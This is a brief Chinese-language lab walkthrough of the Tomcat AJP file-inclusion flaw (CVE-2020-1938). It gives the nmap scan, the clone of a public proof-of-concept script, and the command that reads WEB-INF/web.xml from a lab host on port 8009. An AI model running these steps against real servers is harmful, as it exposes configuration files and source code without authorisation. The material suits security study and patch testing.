CVE-2020-1938
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等。
tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip。
1.使用nmap对靶机进行扫描,查看8009端口是否处于开放状态:
nmap -sS -p 1-65535 -v 192.168.225.139
2.从Github克隆POC脚本到本地kali:
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi.git
3.尝试读取靶机上Tomcat服务器的/usr/local/tomcat/webapps/ROOT/WEB-INF文件:
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.225.139 -p 8009 -f WEB-INF/web.xml